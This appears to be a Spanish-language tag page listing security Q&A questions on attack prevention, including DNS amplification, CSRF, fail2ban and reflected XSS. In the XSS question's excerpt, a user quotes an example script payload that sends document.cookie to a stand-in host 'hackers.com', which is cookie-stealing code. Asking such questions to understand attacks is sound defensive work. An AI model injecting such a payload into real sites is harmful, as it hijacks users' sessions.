Preguntas con etiqueta 'attack-prevention'

2
respuestas

¿Cómo puedo detectar / soportar el ataque de amplificación de DNS?

Soy un desarrollador y estoy tratando de obtener una idea de lo que podría hacer para permitir que mi aplicación resista los ataques de amplificación de DNS. ¿Ayudarían estos métodos de prevención contra ataques de tipo DOS también? ¿Cuáles son...
hecha 12.03.2012 - 20:18
3
respuestas

¿es seguro permitir que se adjunten imágenes externas a Blog o cualquier contenido web?

Estoy filtrando todas las imágenes que se adjuntan a cualquier contenido de mi blog: Compruebe la extensión del archivo. Comprueba el tipo de contenido usando $finfo = finfo_open(FILEINFO_MIME_TYPE); También guardo la imagen tempo...
hecha 04.03.2013 - 21:56
3
respuestas

¿La virtualización como una capa de seguridad para computadoras de escritorio?

Dada la cantidad de complementos de terceros necesarios para navegar en la web, me he visto obligado a virtualizar mis hábitos en línea para obtener una capa adicional de seguridad. Por supuesto, hay algunos inconvenientes obvios: 1) Es ne...
hecha 29.06.2011 - 21:04
2
respuestas

Packet Checksums

Hace poco aprendí que cada paquete incluye bytes de suma de comprobación y que la computadora volverá a solicitar el paquete si las sumas de comprobación no coinciden. ¿Cómo los siguientes ataques derrotan tal salvaguardia? Suplantación ARP:...
hecha 23.08.2014 - 05:34
3
respuestas

¿cómo un iframe puede causar xsrf?

Sé que una etiqueta de formulario es propensa a CSRF que no usa ningún token (o cualquier otro mecanismo de desafío-respuesta) pero me preguntaba cómo se puede usar un iFrame para causar un ataque XSRF y ¿cuáles serían las técnicas de mitigación...
hecha 21.11.2011 - 13:56
1
respuesta

¿Cuál es la configuración predeterminada de fail2ban para los intentos de inicio de sesión de SSH?

Traté de bloquearme desde mi propio servidor para probar si fail2ban funciona correctamente, así que intenté iniciar sesión en ssh y usé una contraseña incorrecta una y otra vez. Pero solo fui bloqueado después de que fallaran 13 inicios de sesi...
hecha 16.12.2012 - 04:26
3
respuestas

¿Cuál es la forma más ligera (literalmente) de ejecutar un segundo sistema seguro?

Mi objetivo es tener dos sistemas separados donde uno sea seguro, incluso si el segundo está lleno de malware. Mi enfoque actual es tener dos computadoras portátiles separadas y la única forma en que estos dos se comunican entre sí es mediante e...
hecha 05.09.2018 - 17:30
2
respuestas

Usando skype para un ataque

Tengo curiosidad por algo; digamos que alguien me agregó aleatoriamente a Skype e intentó iniciar una conversación conmigo y quiero saber más sobre ellos, pero me preocupa que puedan causar algún daño. Mi pregunta es: ¿qué tan peligroso sería...
hecha 10.01.2014 - 15:04
1
respuesta

Ataque XSS reflejado mediante solicitud POST y carga útil XML

Sé que un XSS reflejado se puede hacer con una solicitud GET como: http://site.com?search=<script>location.href='http://hackers.com?sessionToken='+document.cookie;</script> Mientras la respuesta se vea similar a esto: <html...
hecha 15.09.2013 - 22:30
1
respuesta

CSRF con encabezados de OAuth o Autorización de portador

Estoy diseñando una API RESTful a la que se puede acceder desde un navegador web. La API está protegida por autenticación básica. Entiendo el concepto de CSRF y las mitigaciones propuestas (encontré entrada de Wikipedia en CSRF y OWASP CSR...
hecha 13.03.2013 - 19:00